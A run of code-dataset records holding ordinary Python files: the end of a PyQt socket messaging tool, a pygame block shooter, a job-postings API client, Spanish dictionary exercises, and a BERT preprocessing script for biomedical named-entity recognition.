self.actionout.triggered['bool'].connect(self.close)\n # self.actionxinjian.triggered.connect(self.createView)\n self.pushButton_3.clicked.connect(self.click_btn3)\n self.pushButton_4.clicked.connect(self.click_btn4)\n # self.pushButton5.clicked.connect(self.click_btn5)\n # self.pushButton_4.grabKeyboard(self.keycente)\n self.pushButton_6.clicked.connect(self.click_btn6)\n self.pushButton_8.clicked.connect(self.click_btn8)\n self.comboBox.currentIndexChanged.connect(self.click_box)\n\n def write_msg(self,msg):\n \"\"\"\n 功能函数,向接收区写入数据的方法\n 信号-槽触发\n tip:PyQt程序的子线程中,使用非规定的语句向主线程的界面传输字符是不允许的\n :return: None\n \"\"\"\n self.textBrowser_2.insertPlainText(msg)\n self.textBrowser_2.moveCursor(self.textBrowser_2.textCursor().End)\n #重新获取ip\n def click_btn1(self):\n self.lineEdit_2.clear()\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n try:\n s.connect(('8.8.8.8', 80))\n MY_IP = s.getsockname()[0]\n self.lineEdit_2.setText(str(MY_IP))\n except Exception as error:\n try:\n MY_IP = socket.gethostbyname(socket.gethostname())\n self.lineEdit_2.setText(str(MY_IP))\n except Exception as err:\n self.signal_write_msg.emit(\"无法获取ip,请连接网络!\\n\")\n finally:\n s.close()\n #连接网络\n def click_btn2(self):\n\n if self.comboBox.currentIndex() == 0:\n self.tcp_server_start()\n if self.comboBox.currentIndex() == 1:\n self.tcp_client_start()\n if self.comboBox.currentIndex() == 4:\n self.web_server_start()\n self.link = True\n self.pushButton_3.setEnabled(True)\n\n # 断开网络\n def click_btn3(self):\n self.close_socket()\n self.link = False\n # 重置数据\n def reset(self):\n \"\"\"\n 功能函数,将按钮重置为初始状态\n :return:None\n \"\"\"\n self.link = False\n self.client_socket_list = list()\n self.pushButton_3.setEnabled(False)\n self.pushButton_2.setEnabled(True)\n self.plainTextEdit.setReadOnly(False)\n\n def close_socket(self):\n \"\"\"\n 功能函数,关闭网络连接的方法\n :return:\n \"\"\"\n if self.comboBox.currentIndex() == 0 or self.comboBox.currentIndex() == 1:\n self.tcp_close()\n if self.comboBox.currentIndex() == 2 or self.comboBox.currentIndex() == 3:\n self.udp_close()\n if self.comboBox.currentIndex() == 4:\n self.web_close()\n self.reset()\n\n def tcp_close(self):\n \"\"\"\n 功能函数,关闭网络连接的方法\n :return:\n \"\"\"\n if self.comboBox.currentIndex() == 0:\n try:\n for client, address in self.client_socket_list:\n client.close()\n self.tcp_socket.close()\n if self.link is True:\n self.signal_write_msg.emit('已断开网络\\n')\n except Exception as ret:\n pass\n if self.comboBox.currentIndex() == 1:\n try:\n self.tcp_socket.close()\n if self.link is True:\n self.signal_write_msg.emit('已断开网络\\n')\n except Exception as ret:\n pass\n try:\n stop_threading.stop_thread(self.server_threading)\n except Exception:\n pass\n try:\n stop_threading.stop_thread(self.client_threading)\n except Exception:\n pass\n\n def udp_close(self):\n \"\"\"\n 功能函数,关闭网络连接的方法\n :return:\n \"\"\"\n if self.comboBox.currentIndex() == 2:\n try:\n self.udp_socket.close()\n if self.link is True:\n msg = '已断开网络\\n'\n self.signal_write_msg.emit(msg)\n except Exception as ret:\n pass\n if self.comboBox.currentIndex() == 3:\n try:\n self.udp_socket.close()\n if self.link is True:\n msg = '已断开网络\\n'\n self.signal_write_msg.emit(msg)\n except Exception as ret:\n pass\n try:\n stop_threading.stop_thread(self.server_threading)\n except Exception:\n pass\n try:\n stop_threading.stop_thread(self.client_threading)\n except Exception:\n pass\n\n def web_close(self):\n \"\"\"\n 功能函数,关闭网络连接的方法\n :return:\n \"\"\"\n try:\n for client, address in self.client_socket_list:\n client.send('WEB服务端已断开网络\\n')\n client.close()\n self.tcp_socket.close()\n if self.link is True:\n msg = '已断开网络\\n'\n self.signal_write_msg.emit(msg)\n except Exception as ret:\n pass\n try:\n stop_threading.stop_thread(self.server_threading)\n except Exception:\n pass\n try:\n stop_threading.stop_thread(self.client_threading)\n except Exception:\n pass\n #发送消息\n def click_btn4(self):\n if self.comboBox.currentIndex() == 5:\n self.SearchWeChat()\n self.progress_start()\n elif self.link is False:\n self.signal_write_msg.emit( '请选择服务,并点击连接网络\\n')\n self.plainTextEdit.setPlainText('')\n else:\n try:\n msg = (str(self.plainTextEdit.toPlainText())).encode('utf-8')\n txt = str(self.plainTextEdit.toPlainText())\n if self.comboBox.currentIndex() == 0:\n for client,address in self.client_socket_list:\n client.send(msg)\n self.signal_write_msg.emit('TCP服务端:%s\\n' % txt)\n self.plainTextEdit.setPlainText('')\n if self.comboBox.currentIndex() == 1:\n self.tcp_socket.send(msg)\n self.signal_write_msg.emit('TCP客户端:%s\\n' % txt)\n self.plainTextEdit.setPlainText('')\n if self.comboBox.currentIndex() == 4:\n self.web_send()\n\n except Exception as res:\n self.signal_write_msg.emit(\"发送失败,请查看网络\\n\")\n self.plainTextEdit.setPlainText('')\n\n\n # 清除信息\n def click_btn6(self):\n self.textBrowser_2.clear()\n # 选择服务端\n def click_box(self):\n self.pushButton_8.hide()\n self.lineEdit_3.setText('')\n self.plainTextEdit.setReadOnly(False)\n self.pushButton_2.setEnabled(True)\n self.pushButton_3.setEnabled(True)\n self.pushButton.setEnabled(True)\n if self.comboBox.currentIndex() == 0 or self.comboBox.currentIndex() == 2:\n self.label_3.hide()\n self.lineEdit_4.hide()\n self.label.setText(self._translate(\"TCP-UDP\", \"本地IP地址:\"))\n self.label_2.setText(self._translate(\"TCP-UDP\", \"端口号:\"))\n if self.comboBox.currentIndex() == 1 or self.comboBox.currentIndex() == 3:\n self.label_3.show()\n self.lineEdit_4.show()\n\n self.label.setText(self._translate(\"TCP-UDP\", \"本地IP地址:\"))\n self.label_2.setText(self._translate(\"TCP-UDP\", \"目标端口:\"))\n if self.comboBox.currentIndex() == 4:\n self.pushButton_8.show()\n self.plainTextEdit.setReadOnly(True)\n self.label_3.hide()\n self.lineEdit_4.hide()\n self.label.setText(self._translate(\"TCP-UDP\", \"本地IP地址:\"))\n self.label_2.setText(self._translate(\"TCP-UDP\", \"端口号:\"))\n if self.comboBox.currentIndex() == 5:\n self.pushButton.setEnabled(False)\n self.label.setText(self._translate(\"TCP-UDP\", \"微信名称:\"))\n self.label_2.setText(self._translate(\"TCP-UDP\", \"倒计时(秒):\"))\n # self.plainTextEdit.setReadOnly(True)\n self.link = True\n self.lineEdit_2.setText('')\n self.label_3.hide()\n self.pushButton_2.setEnabled(False)\n self.pushButton_3.setEnabled(False)\n self.lineEdit_4.hide()\n\n def textBrowser2(self):\n # self.textBrowser_2.insertPlainText(self.msg)\n print('ssssssss')\n # 查询端口\n def click_actioncs(self):\n self.Makeport()\n # def createView(self):\n # self.newView =Ui_MainWindow()\n # self.newView.setupUi()\n\n def Makeport(self):\n # port_list = []\n # port_dict = {\"data\": None}\n cmd = 'netstat -ano'\n local_ports = os.popen(cmd).readlines()\n for port in local_ports:\n self.signal_write_msg.emit(port.replace(\"\\n\", \"\"))\n\n local_ports.close()\n # pdict[\"TCP_PORT\"] = port.replace(\"\\n\", \"\")\n # port_list.append(pdict)\n # port_dict[\"data\"] = port_list\n # jsonStr = json.dumps(port_dict, sort_keys=True, indent=4)\n #\n # print(jsonStr)\n\n # 选择文件\n\n def click_btn8(self):\n self.choseFile()\n\n def keyPressEvent(self, event):\n # print(Qt.Key_Enter)\n # print(event.key())\n if event.key() == 16777220:\n print('sss')\n\n\n# 线程\nclass StopThreading:\n \"\"\"强制关闭线程的方法\"\"\"\n @staticmethod\n def _async_raise(tid, exc_type):\n tid = ctypes.c_long(tid)\n if not inspect.isclass(exc_type):\n exc_type = type(exc_type)\n res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, ctypes.py_object(exc_type))\n if res == 0:\n raise ValueError(\"invalid thread id\")\n elif res != 1:\n ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None)\n raise SystemError(\"PyThreadState_SetAsyncExc failed\")\n\n def stop_thread(self, thread):\n self._async_raise(thread.ident, SystemExit)\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n demo = Tcp_nhs()\n demo.show()\n sys.exit(app.exec_())","repo_name":"Mirefire/Msgpyqt","sub_path":"DemoMenu.py","file_name":"DemoMenu.py","file_ext":"py","file_size_in_byte":12297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15645342260","text":"import random\nimport pygame\n\npygame.init()\n\nres = (300,300)\nwin = pygame.display.set_mode(res)\npygame.display.set_caption(\"Block Shooter\")\nfr = pygame.time.Clock()\ncBlack = (0,0,0)\ncRed = (255,0,0)\ncGreen = (0,255,0)\ncBlue = (0,0,255)\ncWhite = (255,255,255)\n\nx=25\ny=275\nx1=x\ny1=y\nx2=0\ny2=0\nwidth=25\nheight=25\nvel = 10\nrun = True\nmfont = pygame.font.Font('comicz.ttf', 20)\n\ndef renderonwin():\n\twin.fill(cBlack)\n\ttext = mfont.render(\"Score :\" + str(Score),True,cWhite)\n\twin.blit(text,(145,0))\n\tshoot()\n\tenemy()\n\tpygame.draw.rect(win,cBlue,(x,y,width,height))\n\n\tpygame.display.update()\n\ndef enemy():\n\tpygame.draw.rect(win,cRed,(x2,y2,20,20))\n\ndef shoot():\n\tpygame.draw.rect(win,cWhite,(x1,y1,10,10))\n\nbullet = True\nenemydead = True\nScore = 0\n\n\nwhile run:\n\tfr.tick(30)\n\tif enemydead == True:\n\t\tx2 = random.randint(0,270)\n\t\ty2 = random.randint(75,100)\n\n\tenemydead = False\n\t\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\trun = False\n\tkeyp = pygame.key.get_pressed()\n\n\tif bullet == True:\n\t\tif y1 > 0:\n\t\t\ty1 -= vel\n\t\telse:\n\t\t\tbullet = False\n\n\tif y1 >= y2 and y1 <= y2+20:\n\t\tif x1 >= x2 and x1 <= x2+20:\n\t\t\tScore += 1\n\t\t\tenemydead = True\n\n\n\tif keyp[pygame.K_SPACE]:\n\t\tx1=x\n\t\ty1=y\n\t\tbullet = True\n\n\tif keyp[pygame.K_RIGHT]:\n\t\tif x < res[1]-width:\n\t\t\tx += vel\n\tif keyp[pygame.K_LEFT]:\n\t\tif x > 0:\n\t\t\tx -= vel\n\n\trenderonwin()\npygame.quit()","repo_name":"DocMonster7/Block-Shooters","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71516232747","text":"\"\"\"Summary\n\"\"\"\nfrom .base import JobPostingsConnection\n\n\nclass UKPostingsConnection(JobPostingsConnection):\n \"\"\"docstring for UKPostingsConnection\n\n Attributes:\n base_url (str): Description\n scope (str): Description\n token (str): Description\n \"\"\"\n\n def __init__(self) -> None:\n \"\"\"Summary\n \"\"\"\n super().__init__()\n self.base_url = \"https://emsiservices.com/uk-jpa/\"\n self.scope = \"postings:uk\"\n\n self.get_new_token()\n\n self.name = \"UK_Postings\"\n","repo_name":"calebjcourtney/EmsiApiPy","sub_path":"apis/unitedKingdomPostings.py","file_name":"unitedKingdomPostings.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"40519083621","text":"def tuplas_diccionario(lista_tuplas):\r\n\tdict = {}\r\n\tfor i,j in lista_tuplas:\r\n\t\tif i in dict:\r\n\t\t\tdict[i].append(j)\r\n\t\telse:\r\n\t\t\tdict[i] = j.split(\",\")\r\n\treturn dict\r\n\t\r\ndef contar_palabras(cadena):\r\n\tlista_palabras = cadena.split()\r\n\tdict = {}\r\n\tfor i in lista_palabras:\r\n\t\tif i in dict:\r\n\t\t\tdict[i] += 1\r\n\t\telse:\r\n\t\t\tdict[i] = 1\r\n\treturn dict\r\n\t\r\ndef contar_letras(cadena):\r\n\tlista_letras = list(cadena)\r\n\tdict = {}\r\n\tfor i in lista_letras:\r\n\t\tif i in dict:\r\n\t\t\tdict[i] += 1\r\n\t\telse:\r\n\t\t\tdict[i] = 1\r\n\treturn dict\r\n\r\ndef usar_agenda(agenda):\r\n\twhile True:\r\n\t\tnombre = input(\"El numero de quien desea ver/agendar: \")\r\n\t\tif nombre == \"*\":\r\n\t\t\treturn\r\n\t\tif nombre in agenda:\r\n\t\t\tprint(agenda[nombre])\r\n\t\telse:\r\n\t\t\tagenda[nombre] = input(\"Ingrese num\")","repo_name":"FdelMazo/7540rw-Algo1","sub_path":"Ejercicios de guia/unidad9.py","file_name":"unidad9.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7730955978","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport json\nimport re\nimport torch\nfrom pytorch_pretrained_bert import BertTokenizer, BertModel, BertForMaskedLM, BasicTokenizer\nimport os\n\nbasicTokenizer = BasicTokenizer()\n\nMAX_SENT_LENGTH = 200\n\n# 加载词典 pre-trained model tokenizer (vocabulary)\nVOCAB = './bert-large-cased-vocab.txt'\ntokenizer = BertTokenizer.from_pretrained('bert-base-uncased')\n\n\ndef match_brackets(s, i):\n if s[i] == '(':\n end_bracket = ')'\n elif s[i] == '[':\n end_bracket = ']'\n elif s[i] == '{':\n end_bracket = '}'\n elif s[i] == '<':\n end_bracket = '>' # Introduce this for start-end match\n else:\n raise ValueError('Not match')\n i += 1\n while True:\n if s[i] == end_bracket:\n return i + 1\n else:\n i = match_brackets(s, i)\n\ndef is_match(s):\n try:\n s = ''.join(c for c in s if c in ('(','[','{','}',']',')'))\n match_brackets('<' + s + '>', 0)\n except ValueError:\n return False\n else:\n return True\n\n# {\"originalText\": \"印度海军近日从“加尔各答”级驱逐舰上试射了由印度和以色列联合研制的远程面空导弹?试验在位于印度西海岸的“加尔各答”级驱逐舰上进行?试验中,该导弹成功拦截了一个增程型空中目标?此次试验的“巴拉克”-8导弹由印度国防研究与发展局?以色列航空工业公司?以色列武器研发与技术基础设施管理局?埃尔塔系统公司?拉法尔公司等机构联合研制?\",\n# \"entities\": [{\"label_type\": \"试验要素\", \"overlap\": 0, \"start_pos\": 8, \"end_pos\": 17}, {\"label_type\": \"试验要素\", \"overlap\": 0, \"start_pos\": 34, \"end_pos\": 39}, {\"label_type\": \"试验要素\", \"overlap\": 0, \"start_pos\": 80, \"end_pos\": 86}, {\"label_type\": \"试验要素\", \"overlap\": 0, \"start_pos\": 93, \"end_pos\": 101}]}\n\n# {\"entity\": \"bimagrumab\", \"type\": \"Drug\", \"start\": 35, \"end\": 45}\n\ndef generate_train_json(data_sign):\n if data_sign == \"train\":\n file_path = '../origin_data/new_train.json'\n elif data_sign == \"val\" or data_sign == \"val_test\":\n file_path = '../origin_data/new_val.json'\n else:\n return None\n fr = open(file_path, 'r', encoding='utf-8')\n datas = []\n entity_type = set()\n index = 0\n for line in fr:\n index += 1\n # if index > 100:\n # break\n line = json.loads(line)\n if data_sign == 'train':\n text = line['text'].replace('\\t', '.')\n entities = line['entities']\n if data_sign == 'val':\n text = line['text'].replace('\\t', '.')\n entities = []\n else:\n text = line['text']\n entities = []\n\n context_list = text.split('. ')\n token_lens = [len(tokenizer.tokenize(contexts)) for contexts in context_list]\n\n index = 0\n while index < len(token_lens):\n while index + 1 < len(token_lens) and token_lens[index] + token_lens[index + 1] < MAX_SENT_LENGTH:\n token_lens[index] += token_lens[index + 1]\n del token_lens[index + 1]\n context_list[index] = context_list[index] + '. ' + context_list[index + 1]\n del context_list[index + 1]\n index += 1\n\n entity_dict = {}\n label = {\n \"Disease\": [],\n \"Phenotype\": [],\n \"Drug\": [],\n \"Organization\": [],\n \"Gene\": [],\n \"Virus\": [],\n \"ChemicalCompound\": [],\n \"Chemical\": [],\n }\n label_entity = {\n \"Disease\": [],\n \"Phenotype\": [],\n \"Drug\": [],\n \"Organization\": [],\n \"Gene\": [],\n \"Virus\": [],\n \"ChemicalCompound\": [],\n \"Chemical\": [],\n }\n label_entity_ = {\n \"Disease\": [],\n \"Phenotype\": [],\n \"Drug\": [],\n \"Organization\": [],\n \"Gene\": [],\n \"Virus\": [],\n \"ChemicalCompound\": [],\n \"Chemical\": [],\n }\n label_entity__ = {\n \"Disease\": [],\n \"Phenotype\": [],\n \"Drug\": [],\n \"Organization\": [],\n \"Gene\": [],\n \"Virus\": [],\n \"ChemicalCompound\": [],\n \"Chemical\": [],\n }\n # 使用空格切分\n tokenized_text = basicTokenizer.tokenize(text)\n entity_str_list = []\n for i in entities:\n # entity_dict['label_type'] = i['type']\n # entity_dict['overlap'] = 0\n # entity_dict['start_pos'] = i['start']\n # entity_dict['end_pos'] = i['end']\n entity_type.add(i['type'])\n\n entity_str = text[i['start']: i['end']]\n entity_list = basicTokenizer.tokenize(entity_str)\n start_text = basicTokenizer.tokenize(text[: i['start']])\n start = len(start_text)\n end = start + len(entity_list)\n\n label[i['type']].append(str(start) + ',' + str(end))\n label_entity[i['type']].append(text[i['start']: i['end']])\n label_entity_[i['type']].append(tokenized_text[start: end])\n\n entity_str_list.append(entity_str)\n datas.append(\n {\n # \"entity_str_list\": entity_str_list,\n 'context': text,\n # 'tokenized_text': tokenized_text,\n 'label': label,\n 'label_entity': label_entity,\n # 'label_entity_': label_entity_,\n }\n )\n return datas\n\n\ndef generate_process_data():\n datas_train = generate_train_json(\"train\")\n # i = int(len(datas_train) / 2)\n # datas_train = datas_train[:i]\n # datas_val = generate_train_json(\"val\")\n # i = int(len(datas_val) / 3)\n # datas_val = datas_val[6000:8000]\n # datas_val = generate_train_json(\"val_test\")\n\n with open('train.json', 'w', encoding='utf-8') as file_obj:\n json.dump(datas_train, file_obj, ensure_ascii=False)\n # with open('val.json', 'w', encoding='utf-8') as file_obj:\n # json.dump(datas_val, file_obj, ensure_ascii=False)\n # with open('val_test.json', 'w', encoding='utf-8') as file_obj:\n # json.dump(datas_val, file_obj, ensure_ascii=False)\n print('保存成功')\n\n\ndef caculate_vocab_num():\n fr = open('../origin_data/new_train.json', 'r', encoding='utf-8')\n\n step = 0\n sets = set()\n lists = []\n\n for line in fr:\n # step += 1\n # if step == 50:\n # break\n line = json.loads(line)\n i = line['text']\n ins = i.split('\\t')\n strs1 = []\n for j in ins:\n strs1 = j.split(' ')\n for z in strs1:\n if z.replace('.', '').replace(',', '') not in tokenizer.vocab:\n if not (bool(re.search(r'\\d', z)) or (':' in z) or ('!' in z)):\n sets.add(z.replace('.', '').replace(',', ''))\n lists.append(z.replace('.', '').replace(',', ''))\n\n list_dict = {}\n for i in lists:\n if i not in list_dict.keys():\n list_dict[i] = 1\n else:\n list_dict[i] = list_dict[i] + 1\n\n list_1 = []\n list_10 = []\n list_50 = []\n list_100 = []\n list_1000 = []\n\n for key, value in list_dict.items():\n if value < 10:\n list_1.append(key)\n elif 10 <= value < 50:\n list_10.append(key)\n elif 50 <= value < 100:\n list_50.append(key)\n elif 100 <= value < 1000:\n list_100.append(key)\n else:\n list_1000.append(key)\n\n print(list_dict)\n\n with open('train.json', 'w', encoding = 'utf-8') as file_obj:\n json.dump(i, file_obj,ensure_ascii=False, indent=4)\n\n print('保存成功')\n\n\ndef caculate_sent_num():\n fr = open('../origin_data/new_train.json', 'r', encoding='utf-8')\n\n lists = []\n\n num_100 = 0\n num_200 = 0\n num_300 = 0\n num_400 = 0\n num_500 = 0\n\n for line in fr:\n line = json.loads(line)\n i = line['text']\n ins_len = re.split(r\"[ \\t]\", i)\n\n ins = i.split('\\t')\n ins_num = len(ins)\n\n lists.append({'text': i,\n 'ins': ins,\n 'ins_len': ins_len,\n 'ins_num': ins_num\n })\n\n if 200 > len(ins_len) > 100:\n num_100 += 1\n if 300 > len(ins_len) > 200:\n num_200 += 1\n if 400 > len(ins_len) > 300:\n num_300 += 1\n if 500 > len(ins_len) > 400:\n num_400 += 1\n if len(ins_len) > 256:\n num_500 += 1\n\n print(num_100)\n print(num_200)\n print(num_300)\n print(num_400)\n print(num_500)\n print('stop')\n\ndef caculate_sent_num_for_bert():\n fr = open('../origin_data/new_train.json', 'r', encoding='utf-8')\n\n lists = []\n\n num_10 = 0\n num_100 = 0\n num_200 = 0\n num_300 = 0\n num_400 = 0\n num_500 = 0\n\n for line in fr:\n line = json.loads(line)\n i = line['text']\n if \"\\t\" in i:\n print(\"stop\")\n ins_len = tokenizer.tokenize(i)\n\n if 100 > len(ins_len) > 0:\n num_10 += 1\n if 200 > len(ins_len) > 100:\n num_100 += 1\n if 300 > len(ins_len) > 200:\n num_200 += 1\n if 400 > len(ins_len) > 300:\n num_300 += 1\n if 500 > len(ins_len) > 400:\n num_400 += 1\n if len(ins_len) > 500:\n num_500 += 1\n\n print(num_10)\n print(num_100)\n print(num_200)\n print(num_300)\n print(num_400)\n print(num_500)\n print('stop')\n\ndef generate_result():\n fr1 = open('result.json', 'r', encoding='utf-8')\n span_triple_lst = json.load(fr1)\n fr2 = open('val_test.json', 'r', encoding='utf-8')\n lines = json.load(fr2)\n\n # span_triple_lst = span_triple_lst[:80]\n # lines = lines[:10]\n\n sent_list = []\n for line in lines:\n for i in range(8):\n # sent_list.append({'context': line['context'], 'entity': line['label'], 'entity_str': line['label_entity']})\n sent_list.append({'context': line['context'], 'entity': line['label']})\n result = []\n submit_entity_prob = []\n submit = []\n sents = []\n\n index_sent = 0\n\n print(len(sent_list))\n print(len(span_triple_lst))\n\n for sent, triple in zip(sent_list, span_triple_lst):\n index_sent += 1\n # if index_sent > 1000:\n # break\n # 获取真实实体\n if len(triple) is 0:\n continue\n tag = triple[0]['tag']\n query_len = type_len[tag]\n\n # 获取预测的实体\n bert_ins = tokenizer.tokenize(sent['context'])\n\n entity_prob = []\n # entity_nest = []\n\n # !! 使用规则的方式匹配实体\n # 第一步,首先将被切分成多个片段的实体组合成一个完整的实体片段\n # for i in triple:\n # # 使用规则删除重叠实体\n # # if i['begin'] in entity_nest:\n # # continue\n # # 使用规则删除过长的片段\n # # if i['end'] - i['begin'] > 40:\n # # continue\n # # entity_nest.append(i['begin'])\n #\n # entity = bert_ins[i['begin'] - query_len - 2: i['end'] - query_len - 2]\n # span_true = []\n # flag = False\n #\n # for index in range(len(entity)):\n # if index == 0:\n # span_true.append(entity[index])\n # elif \"##\" in entity[index]:\n # # 带有 ## 的片段和前面的片段进行拼接\n # span_true.append(span_true.pop() + entity[index].replace(\"##\", ''))\n # elif \"-\" is entity[index]:\n # # 带有 - 的片段和前后两个片段进行组合\n # span_true.append(span_true.pop() + entity[index] + entity[index + 1])\n # flag = True\n # elif flag:\n # flag = False\n # else:\n # span_true.append(entity[index])\n # span_true = ' '.join(span_true)\n #\n # # 解决括号不匹配问题\n # # if span_true.count(\"(\") != span_true.count(\")\"):\n # # continue\n # if not is_match(span_true):\n # continue\n #\n # entity_prob.append(span_true)\n\n # !! 使用正则表达式的方式匹配实体\n for i in triple:\n entity = bert_ins[i['begin'] - query_len - 2: i['end'] - query_len - 2]\n\n entity_span_list = []\n for spans in entity:\n entity_span_list.append(\n spans.replace(')', \"\\)\").replace('(', \"\\(\") \\\n .replace('$', \"\\$\").replace('?', \"\\?\").replace('*', \"\\*\") \\\n .replace('+', \"\\+\").replace('.', \"\\.\").replace('[', \"\\[\") \\\n .replace('{', \"\\{\").replace('|', \"\\|\").replace('^', \"\\^\") \\\n .replace('##', \"\")\n )\n span_true = '\\s*'.join(entity_span_list)\n\n # 解决括号不匹配问题\n if not is_match(span_true):\n continue\n\n pattern = re.compile(span_true)\n\n entity_prob.append(pattern)\n # result.append({'context': sent['context'], 'tag': tag, 'entity_truth': sent['entity_str'][tag], 'entity_prob': entity_prob})\n result.append({'context': sent['context'], 'tag': tag, 'entity_prob': entity_prob})\n\n # with open('results.json', 'w', encoding = 'utf-8') as file_obj:\n # json.dump(result, file_obj,ensure_ascii=False, indent=4)\n # print(len(result))\n\n sents = []\n submit_entity_prob = []\n # 第二部,按标准答案的要求,修改定位实体位置的标签\n for result_ in result:\n\n # 首先拿到所需内容\n ins = result_['context']\n tag = result_['tag']\n entity_prob = result_['entity_prob']\n\n ins_lower = ins.lower()\n\n remeber = []\n # 将原始句子中的词全部变成小写,然后查找实体在句子中的位置\n for entity in entity_prob:\n # 去掉重复片段\n if entity in remeber:\n break\n remeber.append(entity)\n for i in re.finditer(entity, ins_lower):\n start = i.start()\n end = i.end()\n # {\"entity\": \"tetanus\", \"type\": \"Disease\", \"start\": 14, \"end\": 21}\n submit_entity_prob.append(\n {\"entity\": ins[start: end], \"type\": tag, \"start\": start, \"end\": end})\n\n # if len(sents) == 0:\n # sents.append(ins)\n # submit.append({'text': ins, 'entities': submit_entity_prob})\n # if ins not in sents:\n # if len(sents) > 0:\n # submit.append({'text': sents.pop(), 'entities': submit_entity_prob})\n # submit_entity_prob = []\n # sents.append(ins)\n\n if ins not in sents:\n submit.append({'text': ins, 'entities': submit_entity_prob})\n sents.append(ins)\n submit_entity_prob = []\n else:\n submit[-1]['entities'] += submit_entity_prob\n submit_entity_prob = []\n\n with open('submit.json', 'w', encoding = 'utf-8') as file_obj:\n json.dump(submit, file_obj, ensure_ascii=False, indent=4)\n print(len(submit))\n\n\n# 利用有标数据构建一个实体知识图谱\ndef generate_kg():\n kg_entity = set()\n file_path = '../origin_data/new_train.json'\n fr = open(file_path, 'r', encoding='utf-8')\n\n for line in fr:\n line = json.loads(line)\n entities = line['entities']\n for entity in entities:\n kg_entity.add((entity['entity'], entity['type']))\n\n with open('kg.json', 'w', encoding = 'utf-8') as file_obj:\n json.dump(list(kg_entity), file_obj, ensure_ascii=False, indent=4)\n\n\n# 将知识图谱对齐测试集得到一定数量的实体\ndef kg_find_entity():\n file_path = 'kg.json'\n fr = open(file_path, 'r', encoding='utf-8')\n kg_entitys = json.load(fr)\n return kg_entitys\n\n\n# 最终处理成提交格式,将句子改为和原始数据对应的句子\ndef generate_submit():\n fr3 = open('val_test.json', 'r', encoding='utf-8')\n sentence = json.load(fr3)\n fr4 = open('submit.json', 'r', encoding='utf-8')\n submit = json.load(fr4)\n fw5 = open('submit_on_system_10_29.json', 'w', encoding='utf-8')\n # {\"text\": \"Molecular diagnostics for sleeping sickness: what is the benefit for the patient?\\tSleeping\n # \"entities\": [{\"entity\": \"entity\", \"type\": \"type\", \"start\": 1, \"end\": 2},\n # {\"entity\": \"entity\", \"type\": \"type\", \"start\": 1, \"end\": 2}]}\n\n # for tuple in submit:\n # for sent in sentence:\n # if sent['context'].replace('\\t', '.') == tuple['text']:\n # f.write(str({\"text\": sent['context'], \"entities\": tuple['entities']}) + '\\n')\n # del (sentence[0])\n # break\n\n kg_entitys = kg_find_entity()\n # sentence = sentence[:20]\n for sent in sentence:\n dict = {\"text\": sent['context'], \"entities\": []}\n for tuple in submit:\n if sent['context'].replace('\\t', '.') == tuple['text']:\n dict[\"entities\"] += tuple['entities']\n # if len(tuple['entities']) is not 0:\n submit.remove(tuple)\n break\n context_list = list(sent['context'])\n for entity_str in kg_entitys:\n entity = entity_str[0]\n tag = entity_str[1]\n if tag in ['Drug', 'Phenotype']:\n continue\n if entity in sent['context']:\n for i in re.finditer(entity, sent['context']):\n start = i.start()\n end = i.end()\n # {\"entity\": \"tetanus\", \"type\": \"Disease\", \"start\": 14, \"end\": 21}\n if start - 1 > 0 and end < len(context_list):\n if sent['context'][start - 1] is ' ' and sent['context'][end] is ' ':\n if {\"entity\": sent['context'][start: end], \"type\": tag, \"start\": start, \"end\": end} not in dict['entities']:\n dict['entities'].append({\"entity\": sent['context'][start: end], \"type\": tag, \"start\": start, \"end\": end})\n elif start == 0 and end < len(sent['context']):\n if sent['context'][end] is ' ':\n if {\"entity\": sent['context'][start: end], \"type\": tag, \"start\": start, \"end\": end} not in dict['entities']:\n dict['entities'].append({\"entity\": sent['context'][start: end], \"type\": tag, \"start\": start, \"end\": end})\n elif start - 1 > 0 and end == len(sent['context']):\n if sent['context'][start - 1] is ' ':\n if {\"entity\": sent['context'][start: end], \"type\": tag, \"start\": start, \"end\": end} not in dict['entities']:\n dict['entities'].append({\"entity\": sent['context'][start: end], \"type\": tag, \"start\": start, \"end\": end})\n else:\n continue\n # pattern = re.compile(\"\\s{1}\\(?\" + entity + '\\)?\\s{1}')\n # for i in re.finditer(pattern, sent['context']):\n # start = i.start()\n # end = i.end()\n # start_pos = start\n # end_pos = end\n # # 对正则表达式匹配出的位置进行修改\n # if sent['context'][start] in [' ', '(', '\\t']:\n # start_pos = start + 1\n # if sent['context'][start + 1] in [' ', '(', '\\t']:\n # start_pos = start + 2\n # if sent['context'][end - 1] in [' ', '(', '\\t']:\n # end_pos = end - 1\n # if sent['context'][end - 2] in [' ', '(', '\\t']:\n # end_pos = end - 2\n #\n # if {\"entity\": sent['context'][start_pos: end_pos], \"type\": tag, \"start\": start_pos, \"end\": end_pos} not in dict['entities']:\n # dict['entities'].append({\"entity\": sent['context'][start_pos: end_pos], \"type\": tag, \"start\": start_pos, \"end\": end_pos})\n data = json.dumps(dict, ensure_ascii=False)\n if len(dict['entities']) is not 0:\n fw5.write(data + '\\n')\n\n fw5.close()\n print('保存成功')\n\n\ndef caculate_query_len():\n fr = open('../query/en_ccks_covid19.json', 'r', encoding='utf-8')\n\n type_dict = json.load(fr)\n\n type_dict = type_dict['default']\n type_len = {}\n for key, value in type_dict.items():\n type_len[key] = len(tokenizer.tokenize(value))\n\n print(type_len)\n\n\ntype_len = {'Disease': 19, 'Phenotype': 18, 'Drug': 28, 'ChemicalCompound': 9, 'Gene': 11, 'Virus': 23, 'Organization': 14, 'Chemical': 8}\n\n\nif __name__ == '__main__':\n # caculate_vocab_num()\n # caculate_sent_num()\n # caculate_sent_num_for_bert()\n generate_process_data()\n # generate_result()\n # generate_submit()\n # caculate_query_len()\n\n # 知识图谱补充\n # 